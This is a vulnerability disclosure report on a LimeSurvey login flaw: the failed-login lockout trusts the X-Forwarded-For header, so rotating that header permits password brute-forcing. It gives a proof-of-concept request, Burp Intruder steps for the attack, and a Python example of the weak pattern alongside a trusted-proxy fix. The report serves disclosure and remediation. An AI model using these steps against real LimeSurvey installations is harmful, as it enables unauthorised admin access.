Bypassing IP detection leads to a brute-force attack in limesurvey/limesurvey
Reported on Feb 24th 2023
Description
In the login function, by default the source IP address is blocked once the user has entered incorrect credentials more than 3 times. This mechanism can be bypassed by abusing the X-Forwarded-For header: the lockout is keyed on the address taken from that client-controlled header, so changing the header evades the IP detection and allows a password brute-force.
Proof of Concept
POST /LimeSurvey/index.php/admin/authentication/sa/login HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Origin: http://localhost:8888
Referer: http://localhost:8888/LimeSurvey/index.php/admin/authentication/sa/login
Cookie: PHPSESSID=4c6885df75ee21adc859130d344ad10e; LS-GXWBZDRRIABHCKHE=l0l8po0cduq9oqeek2pt7ciu13; YII_CSRF_TOKEN=RTQ0bk95WGFRd09CV3hYU1VDZG1scDBPMlRUTVRSZFO7ptHMioAExLZ4fFXUIL3VABaqXRYtFlMMEqdsdz3RCQ%3D%3D
X-Forwarded-For: 192.168.0.96
Sec-Fetch-User: ?1

YII_CSRF_TOKEN=RTQ0bk95WGFRd09CV3hYU1VDZG1scDBPMlRUTVRSZFO7ptHMioAExLZ4fFXUIL3VABaqXRYtFlMMEqdsdz3RCQ%3D%3D&authMethod=Authdb&user=admin&password=matrix&loginlang=default&action=login&width=1440&login_submit=login
Steps to reproduce
1. Go to http://<limesurvey.host>/index.php/admin/authentication/sa/login; here we will see a login form.
2. Enter any account, like admin:admin, then intercept the request with Burp Suite and send it to the Intruder tab.
3. Add the header X-Forwarded-For: 192.168.0.X.
4. Select the attack type Pitchfork.
5. Set one position at the X character in the X-Forwarded-For header and another on the password field.
6. In the Payloads tab, for the first position set the payload type Numbers with a range from 1 to 100, and for the second position import a wordlist containing the passwords to be brute-forced.
PoC Image
As you can see, I have logged in 100 times (by default this action would be locked from the 4th time onwards), and on the 98th request I successfully logged in with a password from the dictionary.
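The root cause is that the lockout is keyed on an address taken from a header the client controls. The following is an added example (not LimeSurvey's code) contrasting that weak pattern with the usual fix: honour X-Forwarded-For only when the request arrives from a configured trusted reverse proxy, and otherwise key the counter on REMOTE_ADDR. The function and class names, the trusted-proxy range and the peer address 203.0.113.7 are assumptions for the demonstration.

```python
import ipaddress
from collections import defaultdict

MAX_FAILED = 3  # LimeSurvey's default: lock the source IP after 3 failed logins


def client_ip(remote_addr, xff, trusted_proxies, trust_xff_blindly=False):
    """Address the lockout counter is keyed on. remote_addr is the TCP peer
    (REMOTE_ADDR); xff is the raw X-Forwarded-For value or None."""
    if trust_xff_blindly and xff:
        # Weak pattern: the client picks its own "IP" and resets the counter at will.
        return xff.split(",")[0].strip()
    nets = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(addr):
        try:
            return any(ipaddress.ip_address(addr) in n for n in nets)
        except ValueError:  # not an IP literal at all
            return False

    if not xff or not is_trusted(remote_addr):
        return remote_addr  # header from an untrusted peer: ignore it entirely
    # Walk the chain right-to-left; the first hop we do not own is the address
    # a trusted proxy actually saw, which the client cannot choose.
    for hop in reversed([h.strip() for h in xff.split(",")]):
        if not is_trusted(hop):
            return hop
    return remote_addr


class LoginLimiter:
    def __init__(self, trusted_proxies=(), trust_xff_blindly=False):
        self.failed = defaultdict(int)
        self.trusted_proxies = trusted_proxies
        self.trust_xff_blindly = trust_xff_blindly

    def attempt(self, remote_addr, xff, password_ok):
        """True if the attempt reaches the password check, False if locked out."""
        key = client_ip(remote_addr, xff, self.trusted_proxies, self.trust_xff_blindly)
        if self.failed[key] >= MAX_FAILED:
            return False
        if not password_ok:
            self.failed[key] += 1
        return True


def count_allowed(limiter, attempts, remote_addr="203.0.113.7"):
    """Replay the report's pattern: one peer, X-Forwarded-For rotated per request,
    every password wrong. Returns how many requests got past the lockout."""
    return sum(limiter.attempt(remote_addr, f"192.168.0.{i}", False)
               for i in range(1, attempts + 1))
```

With the weak setting all 100 requests reach the password check; with a trusted-proxy list the same peer is locked after 3 failures regardless of the header it sends.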
Impact
This vulnerability allows an attacker to brute-force the admin's password, perform a denial-of-service attack, and so on.
Note to myself: This issue was already reported under https://bugs.limesurvey.org/view.php?id=17595, a fix is proposed with https://bugs.limesurvey.org/view.php?id=15754.